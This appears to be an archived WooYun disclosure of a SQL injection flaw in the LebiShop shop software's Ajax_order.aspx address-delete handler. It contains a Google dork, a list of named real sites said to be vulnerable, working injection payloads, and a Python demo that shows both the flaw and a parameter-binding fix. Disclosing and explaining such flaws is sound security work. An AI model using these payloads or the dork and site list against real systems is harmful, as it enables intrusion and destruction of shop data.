WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles, online reader: http://drop.zone.ci/
2015-01-09: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2015-04-13: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Official site: http://www.lebi.cn/
Demo site: http://demo.lebi.cn/
Google dork: intext:Powered by LebiShop, or alternatively: Powered by LebiShop inurl:Category.aspx
Below are some of the affected sites; the product does have an install base.
http://168dev.com/lebishop/Category.aspx
http://oa.psy123.com.cn/AllCategories.aspx
http://www.huacaiye.com/Category.aspx?tid=1
http://daiba.com.cn/Category.aspx?id=9
http://hkapp.cn/EN/Category.aspx?id=10
http://54mbb.com/EN/NewsDetails.aspx?id=5
http://shop.lutoog.com/Brand.aspx?id=189
http://queengift.net/EN/Brand.aspx?id=190
http://www.snsrn.com/en/
http://www.skycastle100.com/Search.aspx?keyword=lianyiquan
http://71pg.com/Category.aspx?tid=35
http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2
http://lovedou.com/en/
http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1
http://newautoch.com/NewsDetails.aspx?id=5
http://memy.cc/
http://www.thanks789.com/Brand.aspx?id=191
http://m.gzyytz.cn/
Vulnerable URL
http://demo.lebi.cn/ajax/Ajax_order.aspx
The decompiled handler behind __Action=Address_Del (C#):

public void Address_Del()
{
    // RequestString only escapes single quotes; the value is used in a numeric
    // context below, so no single quote is needed to break out of the query.
    string str = RequestTool.RequestString("id");
    if (str == "")
    {
        // "请选择要删除的信息" = "please select the record to delete"
        base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
    }
    else
    {
        // SQL injection: the raw request value is concatenated into the IN (...) list.
        B_Lebi_User_Address.Delete(string.Concat(new object[] { "User_id = ", base.CurrentUser.id, " and id in(", str, ")" }));
        if (B_Lebi_User_Address.GetModel(string.Concat(new object[] { "User_id = ", base.CurrentUser.id, " and id = ", base.CurrentUser.User_Address_id })) == null)
        {
            if (B_Lebi_User_Address.GetModel("User_id = " + base.CurrentUser.id) != null)
            {
                base.CurrentUser.User_Address_id = B_Lebi_User_Address.GetMaxId("User_id=" + base.CurrentUser.id);
            }
            B_Lebi_User.Update(base.CurrentUser);
        }
        base.Response.Write("{\"msg\":\"OK\"}");
    }
}
Proof of vulnerability: visit the URL above (logged in, since the handler uses CurrentUser) and submit the following POST body:
__Action=Address_Del&id=-1) and convert(int,@@version)>0--
The convert(int,@@version) comparison makes SQL Server raise a conversion error whose message contains the server version string, and the trailing -- comments out the closing parenthesis the code appends. Proof of vulnerability as shown above.
Fix: validate the id parameter before it is concatenated into the SQL statement (accept only a comma-separated list of integers, or bind the values as parameters).
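To make the injection point and the fix concrete, the following is an added example written for this page, not LebiShop code: it re-creates the string.Concat predicate from Address_Del in Python against an in-memory SQLite table and puts a hardened version beside it. The table and column names mirror the report (Lebi_User_Address, User_id, id); the sample rows, the attacker's user id and the tautology payload used against SQLite are constructed for the demo (the report's convert(int,@@version) payload is SQL Server specific, so here it is only shown as the string the vulnerable code would build).

```python
"""Added example (not LebiShop code): the Address_Del SQL pattern re-created in
Python against an in-memory SQLite table, beside a hardened version."""
import re
import sqlite3

PAYLOAD = "-1) and convert(int,@@version)>0--"  # the PoC body from the report


def vulnerable_where(user_id: int, id_param: str) -> str:
    # Mirrors string.Concat(new object[]{"User_id = ", user.id, " and id in(", str, ")"}):
    # the raw request value lands inside the SQL text, and a trailing -- in the
    # payload comments out the ")" the code appends.
    return f"User_id = {user_id} and id in({id_param})"


def run_vulnerable(conn: sqlite3.Connection, user_id: int, id_param: str) -> int:
    # Executes the concatenated predicate as-is (what the original code does).
    cur = conn.execute("DELETE FROM Lebi_User_Address WHERE " + vulnerable_where(user_id, id_param))
    return cur.rowcount


def parse_id_list(id_param: str) -> list[int]:
    # Hardened input handling: only a comma-separated list of non-negative
    # integers is accepted. Parentheses, spaces, keywords and comment markers
    # are rejected before any SQL is built, so the payload never reaches the DB.
    if not re.fullmatch(r"\d+(,\d+)*", id_param):
        raise ValueError(f"invalid id list: {id_param!r}")
    return [int(x) for x in id_param.split(",")]


def delete_addresses(conn: sqlite3.Connection, user_id: int, id_param: str) -> int:
    # Hardened delete: ids validated, then bound as parameters; the User_id
    # predicate keeps the delete scoped to the caller's own rows.
    ids = parse_id_list(id_param)
    placeholders = ",".join("?" * len(ids))
    cur = conn.execute(
        f"DELETE FROM Lebi_User_Address WHERE User_id = ? AND id IN ({placeholders})",
        [user_id, *ids],
    )
    return cur.rowcount


def make_db() -> sqlite3.Connection:
    # Constructed sample data: user 1 owns addresses 10 and 11, user 2 owns 20.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Lebi_User_Address (id INTEGER PRIMARY KEY, User_id INTEGER)")
    conn.executemany("INSERT INTO Lebi_User_Address VALUES (?, ?)", [(10, 1), (11, 1), (20, 2)])
    return conn


if __name__ == "__main__":
    # What the vulnerable code sends to SQL Server for the report's payload.
    print(vulnerable_where(1, PAYLOAD))

    # Constructed SQLite payload: a tautology that escapes the IN(...) list and
    # the User_id scope, deleting every user's addresses.
    conn = make_db()
    print("vulnerable delete removed", run_vulnerable(conn, 1, "-1) or 1=1 or (1=0"), "rows")

    # Hardened path: the payload is rejected, and a valid list only touches own rows.
    conn = make_db()
    try:
        delete_addresses(conn, 1, PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
    print("hardened delete removed", delete_addresses(conn, 1, "10,20"), "row")
```

The validation step is what RequestTool.RequestString was missing: escaping quotes does nothing for a value placed in a numeric IN (...) list, so the fix is either a strict integer-list whitelist or parameter binding, and the example does both.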
Vendor response: the vendor could not be contacted, or the vendor actively declined.